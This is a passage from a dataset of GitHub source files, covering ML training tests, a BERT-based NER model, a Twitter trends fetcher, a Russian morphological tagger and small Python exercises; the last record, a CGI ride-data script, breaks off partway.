4))\n\n def val_dataloader(self):\n return DataLoader(RandomDataset(32, 4))\n\n\ndef _fit_model(\n tmpdir, should_signal, val_check_interval, failure_on_step, failure_on_training, on_last_batch, status=None\n):\n seed_everything(42)\n model = TestAutoRestartModelUnderSignal(should_signal, failure_on_step, failure_on_training, on_last_batch)\n\n trainer_kwargs = dict(\n default_root_dir=tmpdir,\n max_epochs=1,\n limit_train_batches=4,\n limit_val_batches=4,\n val_check_interval=val_check_interval,\n num_sanity_val_steps=0,\n )\n\n trainer = Trainer(**trainer_kwargs)\n if should_signal:\n with pytest.raises(ExitGracefullyException, match=status):\n trainer.fit(model)\n else:\n trainer.fit(model)\n assert trainer._terminate_gracefully == should_signal\n\n return model\n\n\n@pytest.mark.parametrize(\"on_last_batch\", [False, True])\n@pytest.mark.parametrize(\"val_check_interval\", [0.5, 1.0])\n@pytest.mark.parametrize(\"failure_on_training\", [False, True])\n@pytest.mark.parametrize(\"failure_on_step\", [False, True])\n@mock.patch.dict(os.environ, {\"PL_FAULT_TOLERANT_TRAINING\": \"1\"})\n@RunIf(min_torch=\"1.7.0\", skip_windows=True)\ndef test_auto_restart_under_signal(on_last_batch, val_check_interval, failure_on_training, failure_on_step, tmpdir):\n \"\"\"This test asserts that if a signal is sent during the training / validation phase, the model should\n restart in a reproducible way.\"\"\"\n\n model_total = _fit_model(tmpdir, False, val_check_interval, failure_on_step, failure_on_training, on_last_batch)\n\n if failure_on_step:\n if on_last_batch:\n if failure_on_training:\n # Breaking on first validation batch.\n # This is done to capture the random state of the validation dataloader.\n status = \"EvaluationEpochLoop:advance\"\n else:\n # when breaking on the last batch of validation, we should exit on `run_end` if val_check_interval == 1.0\n status = (\n \"TrainingEpochLoop:on_run_end\" if val_check_interval == 1.0 else \"TrainingEpochLoop:on_advance_end\"\n )\n else:\n status = \"TrainingEpochLoop:on_advance_end\" if failure_on_training else \"EvaluationEpochLoop:advance\"\n else:\n if val_check_interval == 1.0:\n status = \"TrainingEpochLoop:on_run_end\"\n else:\n # `training_epoch_end` happens after `validation_epoch_end` since Lightning v1.4\n status = \"TrainingEpochLoop:on_run_end\" if failure_on_training else \"TrainingEpochLoop:on_advance_end\"\n\n model_signaled = _fit_model(\n tmpdir, True, val_check_interval, failure_on_step, failure_on_training, on_last_batch, status=status\n )\n checkpoint_path = str(tmpdir / \".pl_auto_save.ckpt\")\n assert os.path.exists(checkpoint_path)\n model_restarted = _fit_model(tmpdir, False, val_check_interval, failure_on_step, failure_on_training, on_last_batch)\n\n # check the batches\n actual = torch.cat(model_signaled.seen_train_batches + model_restarted.seen_train_batches)\n expected = torch.cat(model_total.seen_train_batches)\n assert torch.equal(actual, expected)\n\n # FIXME: why doesn't `on_last_batch` work?\n if failure_on_step and failure_on_training and not on_last_batch:\n assert not torch.equal(model_total.layer.weight, model_signaled.layer.weight)\n assert torch.equal(model_restarted.layer.weight, model_total.layer.weight)\n\n checkpoint = torch.load(checkpoint_path)[\"loops\"][\"fit_loop\"]\n p = checkpoint[\"epoch_loop.batch_progress\"]\n if p[\"is_last_batch\"] and p[\"current\"][\"completed\"] == 4:\n assert \"dataloader_state_dict\" not in checkpoint[\"epoch_loop.state_dict\"]\n else:\n assert \"dataloader_state_dict\" in 
checkpoint[\"epoch_loop.state_dict\"]\n\n state_dict = checkpoint[\"epoch_loop.val_loop.epoch_loop.state_dict\"]\n p = checkpoint[\"epoch_loop.val_loop.epoch_loop.batch_progress\"]\n if (p[\"is_last_batch\"] and p[\"current\"][\"completed\"] == 4) or p[\"current\"][\"ready\"] == 0:\n assert \"dataloader_state_dict\" not in state_dict\n else:\n assert \"dataloader_state_dict\" in state_dict\n","repo_name":"Eashurox/CPDP_ML","sub_path":"Dataset/ML Projects/Lightning_Versions/lightning-1.5.0/tests/utilities/test_auto_restart.py","file_name":"test_auto_restart.py","file_ext":"py","file_size_in_byte":44663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11102333485","text":"import os\nfrom datetime import datetime, timezone, timedelta\nimport tweepy\nfrom dotenv import load_dotenv, find_dotenv\n\nenv_path = os.path.join(os.path.dirname(__file__), \".env\")\nif find_dotenv(env_path):\n load_dotenv(dotenv_path=env_path)\n\nCONSUMER_KEY = os.getenv(\"CONSUMER_KEY\")\nCONSUMER_SECRET = os.getenv(\"CONSUMER_SECRET\")\n\nif not all([CONSUMER_KEY, CONSUMER_SECRET]):\n raise NameError(\"API key is not provided\")\n\nauth = tweepy.AppAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\nWOEID_JAPAN = 23424856\nJST_TZ = timezone(timedelta(hours=9), name=\"JST\")\n\n\ndef get_trend_data():\n trends_japan = api.trends_place(id=WOEID_JAPAN)[0]\n\n date_iso = trends_japan[\"as_of\"]\n date_jst_str = convert_iso_datetime_to_jst(date_iso)\n\n trend_topics = (topic[\"name\"] for topic in trends_japan[\"trends\"])\n trend_ranking = []\n for i, j in enumerate(trend_topics):\n trend_ranking.append({\"number\": i + 1, \"topic_name\": j})\n # The API should only be able to return up to 50 trends, but set an\n # explicit upper limit of 50 in case the specification changes\n if i > 50:\n break\n\n trend = {\n \"date\": date_jst_str,\n \"location\": \"日本\",\n \"rank\": trend_ranking\n }\n return trend\n\n\ndef convert_iso_datetime_to_jst(date_iso, output_format=\"%Y/%m/%d %H:%M\"):\n \"\"\"Convert an ISO 8601 date string to a date string in Japan Standard Time\"\"\"\n date_iso = date_iso.replace(\"Z\", \"+00:00\")\n date = datetime.fromisoformat(date_iso)\n date_jst = date.astimezone(JST_TZ)\n date_jst_str = date_jst.strftime(output_format)\n return date_jst_str\n\n\nif __name__ == \"__main__\":\n trend = get_trend_data()\n print(trend)\n","repo_name":"yuki-data/flask_twitter_trend","sub_path":"twitter_trend.py","file_name":"twitter_trend.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8156030288","text":"\"\"\"\n\n66. 
Plus One\n\nGiven a non-empty array of digits representing a non-negative integer, add one to the integer.\n\nThe digits are stored such that the most significant digit is at the head of the list, and each element in the array contains a single digit.\n\nYou may assume the integer does not contain any leading zero, except the number 0 itself.\n\n\"\"\"\n\nclass Solution:\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n length = len(digits)\n for x in range(length-1, -1, -1):\n if digits[x] == 9 and x == 0:\n digits[x] = 0\n digits.insert(0, 1)\n break\n if digits[x] == 9:\n digits[x] = 0\n continue\n else:\n digits[x] += 1\n break\n \n return digits\n ","repo_name":"kyrierose/leet-code-solutions","sub_path":"66.py","file_name":"66.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18263987798","text":"from rest_framework.exceptions import ValidationError\n\nfrom django.test import TestCase\n\nfrom audoma.drf.validators import ExclusiveFieldsValidator\n\n\nclass ExclusiveFieldsValidatorTestCase(TestCase):\n databases = \"__all__\"\n\n def setUp(self):\n self.validator = ExclusiveFieldsValidator(\n fields=[\"name\", \"company_name\"],\n message=\"Fields: {field_names} are mutually exclusive\",\n required=True,\n message_required=\"At least one of the fields: {field_names} is required\",\n )\n\n def test_call_none_in_data(self):\n try:\n self.validator(data={\"age\": 245})\n except Exception as e:\n self.assertEqual(type(e), ValidationError)\n self.assertEqual(\n str(e.detail[0]),\n \"At least one of the fields: name, company_name is required\",\n )\n\n def test_call_all_in_data(self):\n try:\n self.validator(data={\"name\": \"Test\", \"company_name\": \"Test\"})\n except Exception as e:\n self.assertEqual(type(e), ValidationError)\n self.assertEqual(\n str(e.detail[0]), \"Fields: name, company_name are mutually exclusive\"\n )\n\n def test_call_one_in_data(self):\n try:\n val_response = self.validator(data={\"name\": \"Test\"})\n except Exception as e:\n raise e\n else:\n self.assertIsNone(val_response)\n","repo_name":"Iteo/audoma","sub_path":"audoma/tests/drf/test_validators.py","file_name":"test_validators.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5347979636","text":"#Please write a function named even_numbers, which takes a list of integers as\r\n#an argument. 
The function returns a new list containing the even numbers from\r\n#the original list.\r\n\r\ndef anagrams(word1,word2):\r\n return sorted(word1) == sorted(word2)\r\n \r\n\r\nmy_list = [1, 2, 3, 4, 5]\r\n\r\n\r\ndef even_numbers(my_list):\r\n even_list = []\r\n for i in my_list:\r\n if i%2 == 0:\r\n even_list.append(i)\r\n print(even_list)\r\n return even_list\r\n\r\n\r\nnew_list = even_numbers(my_list)\r\n\r\nprint(\"original\", my_list)\r\nprint(\"new\", new_list)\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"IronixGirl/Python-learning-and-exercises","sub_path":"Week 04 - 05/Exercises/21_function 2.py","file_name":"21_function 2.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70504101603","text":"import tensorflow as tf\nfrom tf_utils.bert_modeling import get_assignment_map_from_checkpoint\nfrom tensorflow.contrib.crf import crf_log_likelihood\nfrom tensorflow.contrib.layers.python.layers import initializers\nfrom tf_utils import rnncell as rnn\nfrom optimization import create_optimizer\n\n\nclass Model:\n def __init__(self, config):\n self.config = config\n # Placeholders for the data fed into the model\n self.input_x_word = tf.compat.v1.placeholder(tf.int32, [None, None], name=\"input_x_word\")\n self.input_x_len = tf.compat.v1.placeholder(tf.int32, name='input_x_len')\n self.input_mask = tf.compat.v1.placeholder(tf.int32, [None, None], name='input_mask')\n self.keep_prob = tf.compat.v1.placeholder(tf.float32, name='dropout_keep_prob')\n self.input_relation = tf.compat.v1.placeholder(tf.int32, [None, None], name='input_relation') # Ground-truth NER labels\n self.is_training = tf.compat.v1.placeholder(tf.bool, None, name='is_training')\n # self.global_step = tf.get_variable('step', [], initializer=0, trainable=False)\n self.global_step = tf.Variable(0, name='step', trainable=False)\n\n # BERT Embedding\n self.word_embedding = self.init_embedding()\n\n # Hyperparameter settings\n self.learning_rate = self.config.learning_rate\n self.embed_learning_rate = self.config.embed_learning_rate\n self.relation_num = self.config.relation_num\n self.initializer = initializers.xavier_initializer()\n self.lstm_dim = self.config.lstm_dim\n # self.embed_dense_dim = self.config.embed_dense_dim\n self.dropout = self.config.dropout\n\n # CRF hyperparameters\n used = tf.sign(tf.abs(self.input_x_word))\n length = tf.reduce_sum(used, reduction_indices=1)\n self.lengths = tf.cast(length, tf.int32)\n self.batch_size = tf.shape(self.input_x_word)[0]\n self.num_steps = tf.shape(self.input_x_word)[-1]\n lstm_inputs = tf.nn.dropout(self.word_embedding, self.dropout)\n lstm_outputs = self.bilstm_layer(lstm_inputs, self.lstm_dim, self.lengths)\n self.logits = self.project_layer(lstm_outputs)\n\n self.trans = tf.compat.v1.get_variable(\n name=\"transitions\",\n shape=[self.relation_num + 1, self.relation_num + 1], # 1\n initializer=self.initializer)\n\n # Compute the loss\n self.loss = self.loss_layer(self.logits, self.lengths)\n\n # Where the BERT model parameters are initialized from\n init_checkpoint = self.config.bert_file\n # Get all trainable parameters of the model.\n tvars = tf.trainable_variables()\n if self.config.model_type == \"XLNET\":\n mark = 'transformer'\n\n else:\n mark = 'bert'\n bert_variables = [x for x in tvars if mark in x.name] # BERT parameters\n normal_variables = [x for x in tvars if mark not in x.name] # parameters of the downstream layers\n print('bert train variable num: {}'.format(len(bert_variables)))\n print('normal train variable num: {}'.format(len(normal_variables)))\n\n # Load the BERT model\n (assignment_map, initialized_variable_names) = 
get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n tf.compat.v1.train.init_from_checkpoint(init_checkpoint, assignment_map)\n print(\"**** Trainable Variables ****\")\n # Print the parameters loaded from the checkpoint\n train_vars = []\n for var in tvars:\n init_string = \"\"\n if var.name in initialized_variable_names:\n init_string = \", *INIT_FROM_CKPT*\"\n else:\n train_vars.append(var)\n print(\" name = {}, shape = {}{}\".format(var.name, var.shape, init_string))\n\n # memory limited ==> sequence_length=64 train_batch_size=5\n with tf.variable_scope(\"optimizer\"):\n normal_optimizer = tf.compat.v1.train.AdamOptimizer(self.learning_rate) # learning rate of the downstream layers\n normal_op = normal_optimizer.minimize(self.loss, global_step=self.global_step, var_list=normal_variables)\n num_train_steps = int(self.config.num_records / self.config.train_batch_size * self.config.train_epoch)\n if bert_variables: # fine-tune BERT\n print('word2vec trainable!!')\n word2vec_op, self.embed_learning_rate = \\\n create_optimizer(\n self.loss, self.embed_learning_rate,\n num_train_steps=num_train_steps,\n num_warmup_steps=int(num_train_steps * self.config.warmup_proportion),\n use_tpu=False, var_list=bert_variables\n )\n\n self.train_op = tf.group(normal_op, word2vec_op) # combine the BERT and downstream update ops\n else:\n self.train_op = normal_op\n\n self.learning_rate = tf.train.exponential_decay(self.learning_rate, self.global_step, self.config.decay_step,\n self.config.decay_rate, staircase=True)\n # saver of the model\n self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=self.config.num_checkpoints)\n\n def bilstm_layer(self, lstm_inputs, lstm_dim, lengths, name=None):\n \"\"\"\n :param lstm_inputs: [batch_size, num_steps, emb_size]\n :param lstm_dim:\n :param lengths:\n :param name:\n :return: [batch_size, num_steps, 2*lstm_dim]\n \"\"\"\n with tf.name_scope(\"char_BiLSTM\" if not name else name):\n lstm_cell = {}\n for direction in [\"forward\", \"backward\"]:\n with tf.name_scope(direction):\n lstm_cell[direction] = rnn.CoupledInputForgetGateLSTMCell(\n lstm_dim,\n use_peepholes=True,\n initializer=self.initializer,\n state_is_tuple=True)\n\n outputs, final_states = tf.nn.bidirectional_dynamic_rnn(\n lstm_cell[\"forward\"],\n lstm_cell[\"backward\"],\n lstm_inputs,\n dtype=tf.float32,\n sequence_length=lengths)\n return tf.concat(outputs, axis=2)\n\n def project_layer(self, lstm_outputs, name=None):\n \"\"\"\n hidden layer between lstm layer and logits\n :param lstm_outputs: [batch_size, num_steps, emb_size]\n :param name:\n :return: [batch_size, num_steps, num_tags]\n \"\"\"\n with tf.name_scope(\"project\" if not name else name):\n with tf.name_scope(\"hidden\"):\n w = tf.get_variable(\"HW\", shape=[self.lstm_dim * 2, self.lstm_dim],\n dtype=tf.float32, initializer=self.initializer)\n\n b = tf.get_variable(\"Hb\", shape=[self.lstm_dim], dtype=tf.float32,\n initializer=tf.zeros_initializer())\n output = tf.reshape(lstm_outputs, shape=[-1, self.lstm_dim * 2])\n hidden = tf.tanh(tf.nn.xw_plus_b(output, w, b))\n\n # project to score of ori_tags.txt\n with tf.name_scope(\"logits\"):\n w = tf.get_variable(\"LW\", shape=[self.lstm_dim, self.relation_num],\n dtype=tf.float32, initializer=self.initializer)\n\n b = tf.get_variable(\"Lb\", shape=[self.relation_num], dtype=tf.float32,\n initializer=tf.zeros_initializer())\n\n pred = tf.nn.xw_plus_b(hidden, w, b)\n\n return tf.reshape(pred, [-1, self.num_steps, self.relation_num], name='pred_logits')\n\n def loss_layer(self, project_logits, lengths, name=None):\n \"\"\"\n Compute the CRF loss\n :param project_logits: [1, num_steps, 
num_tags]\n :param lengths:\n :param name:\n :return: scalar loss\n \"\"\"\n\n with tf.name_scope(\"crf_loss\" if not name else name):\n small = -1000.0\n # pad logits for crf loss\n start_logits = tf.concat(\n [small * tf.ones(shape=[self.batch_size, 1, self.relation_num]),\n tf.zeros(shape=[self.batch_size, 1, 1])],\n axis=-1)\n pad_logits = tf.cast(small * tf.ones([self.batch_size, self.num_steps, 1]), tf.float32)\n logits = tf.concat([project_logits, pad_logits], axis=-1)\n logits = tf.concat([start_logits, logits], axis=1)\n targets = tf.concat(\n [tf.cast(self.relation_num * tf.ones([self.batch_size, 1]), tf.int32), self.input_relation], axis=-1)\n\n log_likelihood, self.trans = crf_log_likelihood(\n inputs=logits,\n tag_indices=targets,\n transition_params=self.trans,\n sequence_lengths=lengths + 1\n )\n return tf.reduce_mean(-log_likelihood, name='loss')\n\n def init_embedding(self):\n \"\"\"\n Reduce the dimensionality of the BERT embedding\n :return:\n \"\"\"\n with tf.name_scope('embedding'):\n word_embedding = self.bert_embed()\n print('self.embed_dense_dim:', self.config.embed_dense_dim)\n word_embedding = tf.layers.dense(word_embedding, self.config.embed_dense_dim, activation=tf.nn.relu)\n print(\"word_embedding.shape:\" + str(word_embedding.shape))\n\n return word_embedding\n\n def bert_embed(self):\n \"\"\"\n Load the BERT TF model\n :return:\n \"\"\"\n if self.config.model_type == \"ALBERT\":\n from tf_utils.albert_modeling import BertModel, BertConfig\n elif self.config.model_type == \"BERT\":\n from tf_utils.bert_modeling import BertModel, BertConfig\n else:\n import tf_utils.xlnet_modeling as xlnet\n xlnet_config = xlnet.XLNetConfig(json_path=self.config.xlnet_config_file)\n run_config = xlnet.create_run_config(self.is_training, True, self.config)\n\n xlnet_model = xlnet.XLNetModel(\n xlnet_config=xlnet_config,\n run_config=run_config,\n input_ids=self.input_x_word,\n seg_ids=None,\n input_mask=self.input_mask)\n final_hidden_states = xlnet_model.get_sequence_output()\n self.config.embed_dense_dim = 512\n return final_hidden_states\n\n bert_config_file = self.config.bert_config_file\n bert_config = BertConfig.from_json_file(bert_config_file)\n # batch_size, max_seq_length = get_shape_list(self.input_x_word)\n # bert_mask = tf.pad(self.input_mask, [[0, 0], [2, 0]], constant_values=1) # pad 2 columns on the left of the tensor\n model = BertModel(\n config=bert_config,\n is_training=self.is_training, # fine-tuning\n input_ids=self.input_x_word,\n input_mask=self.input_mask,\n token_type_ids=None,\n use_one_hot_embeddings=False\n )\n\n if self.config.use_origin_bert:\n final_hidden_states = model.get_sequence_output() # original BERT\n self.config.embed_dense_dim = 1024\n else:\n layer_logits = []\n for i, layer in enumerate(model.all_encoder_layers):\n layer_logits.append(\n tf.layers.dense(\n layer, 1,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02),\n name=\"layer_logit%d\" % i\n )\n )\n\n layer_logits = tf.concat(layer_logits, axis=2) # concatenate along the third dimension\n layer_dist = tf.nn.softmax(layer_logits)\n seq_out = tf.concat([tf.expand_dims(x, axis=2) for x in model.all_encoder_layers], axis=2)\n pooled_output = tf.matmul(tf.expand_dims(layer_dist, axis=2), seq_out)\n pooled_output = tf.squeeze(pooled_output, axis=2)\n char_bert_outputs = pooled_output\n final_hidden_states = char_bert_outputs # multi-layer fused BERT\n self.config.embed_dense_dim = 512\n\n return 
final_hidden_states\n","repo_name":"jevishoo/Tensorflow_NER","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1911423995","text":"import os\nimport csv\nimport glob\nimport json\nimport time\nfrom collections import OrderedDict\nfrom xml.dom.minidom import getDOMImplementation\n\nfrom nltk import word_tokenize\nfrom pymorphy2 import MorphAnalyzer\n\n\nclass Profiler:\n def __enter__(self):\n self._startTime = time.time()\n\n def __exit__(self, type, value, traceback):\n print('Elapsed time: {:.3f} sec'.format(time.time() - self._startTime))\n\n\nclass Processor:\n\n def __init__(self, inpt_dir, otpt_dir, gold_path, coding):\n self.inpt_dir = inpt_dir\n self.otpt_dir = otpt_dir\n os.makedirs(self.otpt_dir, exist_ok=True)\n\n gold_file = open(gold_path, mode='r', encoding='utf-8', newline='')\n self.gold_reader = list(row for row in csv.reader(gold_file, delimiter=';') if int(row[3]) > 3)\n\n self.coding = coding\n self.morph = MorphAnalyzer()\n self.impl = getDOMImplementation()\n\n self.tr = ('?', '!', ';', '(', ')', '[', ']', '//')\n self.nt = (\"'\", \"''\", '\"', '``', '«', '»', '„', '“', '“', '”', '‘', '’', '%')\n self.abbr = json.load(open('abbr.json', mode='r', encoding='utf-8'))\n self.prep = json.load(open('prep.json', mode='r', encoding='utf-8'))\n self.conj = json.load(open('conj.json', mode='r', encoding='utf-8'))\n self.tags = json.load(open('tags_inpt.json', mode='r', encoding='utf-8'))\n\n def format_parses(self, parses):\n\n for i, parse in enumerate(parses):\n result = OrderedDict()\n\n if i > 1:\n prev_word = parses[i - 1][0].normal_form\n else:\n prev_word = ''\n\n for j, item in enumerate(parse):\n pos = self.tags.get(item.tag.POS, '_')\n\n if pos != '_':\n anim = self.tags.get(item.tag.animacy, '_')\n case = self.tags.get(item.tag.case, '_')\n num = self.tags.get(item.tag.number, '_')\n gen = self.tags.get(item.tag.gender, '_')\n pers = self.tags.get(item.tag.person, '_')\n asp = self.tags.get(item.tag.aspect, '_')\n\n if pos in ('Nn', 'Pn'):\n if case != 'Ac':\n anim = '_'\n\n if num == 'Pl':\n gen = '_'\n\n elif pos == 'Vb':\n if pers == '_' and num == 'Pl':\n gen = '_'\n\n if all(gram == '_' for gram in (anim, case, num, gen, pers, asp)):\n result[pos] = item.normal_form\n else:\n result[','.join((pos, anim, case, num, gen, pers, asp))] = item.normal_form\n\n # Punctuation marks, numbers, foreign words and so on\n else:\n pos = self.tags.get(str(item.tag).split(',')[0], '_')\n\n if pos == 'PM':\n try:\n next_word = parses[i + 1][0].normal_form\n next_pair = '%s %s' % (parses[i + 1][0].normal_form, parses[i + 2][0].normal_form)\n\n # Terminal, if 1) at the end of the sentence\n except IndexError:\n if item.normal_form in self.nt:\n result['PM,Nt,_'] = item.normal_form\n else:\n result['PM,Tr,_'] = item.normal_form\n\n else:\n # Terminal, if 2) in the list, 3) before conjunctions\n if item.normal_form in self.tr or next_word in self.conj['Sg'] or next_pair in self.conj['Db']:\n result['PM,Tr,_'] = item.normal_form\n # Non-terminal, if in the list\n elif item.normal_form in self.nt:\n result['PM,Nt,_'] = item.normal_form\n # A period is a non-terminal if a) it follows a single-character token or b) it is part of an abbreviation\n elif item.normal_form == '.' 
and len(prev_word) == 1 or prev_word + item.normal_form in self.abbr:\n result['PM,Nt,_'] = item.normal_form\n # If all else fails, concede the ambiguity\n else:\n for tag in ('PM,Nt,Tr', 'PM,Nt,_', 'PM,Tr,_'):\n result[tag] = item.normal_form\n\n else:\n result[pos] = item.normal_form\n\n for item in result:\n\n if not item.startswith('PM') and prev_word in self.prep:\n new = [pair for pair in result.items() if any(cs in pair[0] for cs in self.prep[prev_word])]\n if new:\n result = OrderedDict(new)\n break\n\n if item.startswith(('Pn', 'Pd', 'Cj', 'Pp', 'Pc')):\n # If it is a pronoun or a predicative pronoun,\n # filter out nouns and predicative adjectives\n if item.startswith(('Pn', 'Pd')):\n new = [pair for pair in result.items() if not pair[0].startswith(\n ('Nn', 'Ap')\n )]\n # If it is a conjunction, preposition or particle,\n # filter out nouns, adjectives, pronouns and interjections\n else:\n new = [pair for pair in result.items() if not pair[0].startswith(\n ('Nn', 'Aj', 'Ap', 'Pn', 'Pd', 'Ij')\n )]\n\n result = OrderedDict(new)\n break\n\n yield result\n\n def process(self):\n\n def generate_log(*pairs):\n s = '{\\n'\n\n for pair in pairs:\n s += ' %s: %s,\\n' % pair\n\n s += '};\\n'\n\n return s\n\n os.chdir(self.inpt_dir)\n print('Please wait. Python is processing your data...')\n\n for file in glob.glob('*.txt'):\n fo = open(file, mode='r', encoding=self.coding)\n doc = self.impl.createDocument(None, 'text', None)\n root = doc.documentElement\n\n # Dictionary for statistics\n stat = {\n 'breaks on start': 0,\n 'regular breaks': 0,\n 'breaks on end': 0,\n 'fallbacks': 0,\n 'terminals': 0\n }\n # List of fallbacks\n log_list = []\n\n for i, line in enumerate(fo.readlines()):\n # List of tokens\n line_tokens = word_tokenize(line)\n # List of ordered dicts of the form {parse: lemma}\n line_parses = list(self.format_parses([self.morph.parse(token) for token in line_tokens]))\n\n p = doc.createElement('p')\n p.setAttribute('n', str(i + 1))\n\n previous = ''\n\n for j, parse_odict in enumerate(line_parses):\n parses = list(parse_odict)\n\n if parses[0].startswith('PM'):\n elem = doc.createElement('pc')\n else:\n elem = doc.createElement('w')\n\n elem_text = doc.createTextNode(line_tokens[j])\n elem.appendChild(elem_text)\n\n for row in self.gold_reader:\n # If the current element is an unambiguously terminal punctuation mark, there is no point searching for a trigram with it\n if parses[0] == 'PM,Tr,_':\n elem.setAttribute('ana', 'PM,Tr,_')\n elem.setAttribute('lemma', parse_odict['PM,Tr,_'])\n previous = 'PM,Tr,_'\n stat['terminals'] += 1\n\n else:\n # If we are at the very start of a sentence/chunk, consider left bigrams\n # Fall back to pymorphy2 only if the current element is the last one in the sentence\n if j == 0 or previous == 'PM,Tr,_':\n if j + 1 != len(line_parses):\n if row[0] in parses and row[1] in line_parses[j + 1]:\n elem.setAttribute('ana', row[0])\n elem.setAttribute('lemma', parse_odict[row[0]])\n previous = row[0]\n stat['breaks on start'] += 1\n\n # If the current element is the last one in the sentence, consider right bigrams\n elif j + 1 == len(line_parses):\n if previous == row[1] and row[2] in parses:\n elem.setAttribute('ana', row[2])\n elem.setAttribute('lemma', parse_odict[row[2]])\n previous = row[2]\n stat['breaks on end'] += 1\n\n # In all other cases, consider full trigrams\n else:\n if row[0] == previous and row[1] in parses and row[2] in line_parses[j + 1]:\n elem.setAttribute('ana', row[1])\n elem.setAttribute('lemma', parse_odict[row[1]])\n previous = 
row[1]\n stat['regular breaks'] += 1\n\n if elem.hasAttributes():\n break\n\n # Fallback if no suitable trigram was found in the gold standard\n if not elem.hasAttributes():\n # Record the trigrams on which the fallback occurred\n if j == 0 and len(line_tokens) == 1:\n log_data = generate_log(\n (line_tokens[j], parses)\n )\n elif j == 0:\n log_data = generate_log(\n (line_tokens[j], parses),\n (line_tokens[j + 1], list(line_parses[j + 1]))\n )\n elif j + 1 == len(line_parses):\n log_data = generate_log(\n (line_tokens[j - 1], previous),\n (line_tokens[j], parses)\n )\n else:\n log_data = generate_log(\n (line_tokens[j - 1], previous),\n (line_tokens[j], parses),\n (line_tokens[j + 1], list(line_parses[j + 1]))\n )\n log_list.append(log_data)\n\n elem.setAttribute('ana', parses[0])\n elem.setAttribute('lemma', parse_odict[parses[0]])\n previous = parses[0]\n stat['fallbacks'] += 1\n\n p.appendChild(elem)\n root.appendChild(p)\n\n # Step into the output directory\n os.chdir(self.otpt_dir)\n\n # Write to XML\n with open(file[:-3] + 'xml', mode='w', encoding='utf-8') as out:\n xml = doc.toprettyxml(indent=' ', encoding='utf-8')\n out.write(xml.decode())\n\n # Write the fallbacks to a log file\n with open(file[:-4] + '_log.txt', mode='w', encoding='utf-8') as log:\n for line in log_list:\n log.write(line + '\\n')\n\n # Print statistics for the file\n print(file)\n for key in stat:\n print(' %d %s' % (stat[key], key))\n\n # Return to the input directory - on to the next files\n os.chdir(self.inpt_dir)\n doc.unlink()\n fo.close()\n\n\nif __name__ == '__main__':\n try:\n with Profiler():\n Processor(os.getcwd() + '\\\\inpt', os.getcwd() + '\\\\otpt', 'trigrams.csv', 'windows-1251').process()\n except FileNotFoundError:\n print('Error: source file missing.')\n","repo_name":"vintagentleman/PM-TXM","sub_path":"process_inpt.py","file_name":"process_inpt.py","file_ext":"py","file_size_in_byte":13472,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32411128198","text":"from model import Model\nfrom view import View\n\n\nclass Controller:\n '''\n Links the interface and the model.\n '''\n\n def __init__(self, model: Model, view: View):\n self.model = model\n self.view = view\n\n def save(self, concrete: str, cement: str,\n water: str, proportion: str,\n sand_density: str, rubber_density: str,):\n \"\"\"\n Save the calculation results.\n \"\"\"\n try:\n self.model.concrete = concrete\n self.model.cement = cement\n self.model.water = water\n self.model.proportion = proportion\n self.model.sand_density = sand_density\n self.model.rubber_density = rubber_density\n\n self.model.calculate()\n\n self.view.show_success('Файл сохранен')\n\n except ValueError as error:\n self.view.show_error(error)\n","repo_name":"nbaishev/concrete_mix_calc","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36856347690","text":"#Weezie Wilson\n#4/19/21: Same as bigrams-random-text.py, but with ngrams\n\ncounts = {}\nwords = []\nn = 5\n\nwith open('txt/tiny.txt', 'r') as f:\n for line in f:\n words.extend(line.strip().split())\n\nprint(words)\n\n# map each n-gram to the list of words that follow it\nfor i in range(len(words)-n):\n lst = []\n for j in range(n):\n lst.append(words[i+j])\n tup = tuple(lst)\n print(tup)\n\n if tup in counts:\n counts[tup].append(words[i+n])\n else:\n counts[tup] = 
[words[i+n]]\n\nprint(counts)\n","repo_name":"michaelschung/bc-ds-and-a","sub_path":"Unit3-Applications/weezie/ngrams-random-text.py","file_name":"ngrams-random-text.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"302128811","text":"#!/usr/bin/env python3\nimport json\nimport random\nfrom pymongo import MongoClient\nfrom xml.dom.minidom import parse\nimport xml.dom.minidom\nfrom icalendar import Calendar, Event\nfrom datetime import datetime\nimport cgi\nimport cgitb\nfrom math import cos, asin, sqrt, pi\ncgitb.enable()\n\ndef main():\n # Set up the database connection\n client = MongoClient()\n db = client.cwm_database\n global rides \n rides = db.rides_collection\n \n # get_average_lon_lat_from_gpx(\"EXAMPLEIDWILLBERANDOM\",2)\n form = cgi.FieldStorage()\n\n if not \"action\" in form:\n print(\"Content-type: text/plain; charset=utf-8\\n\\nNo action\")\n return\n\n if form[\"action\"].value == \"gpx\":\n get_gpx(form[\"ride_id\"].value,form[\"route\"].value)\n\n elif form[\"action\"].value == \"ics\":\n get_ics(form[\"ride_id\"].value,form[\"route\"].value)\n\n elif form[\"action\"].value == \"json\":\n 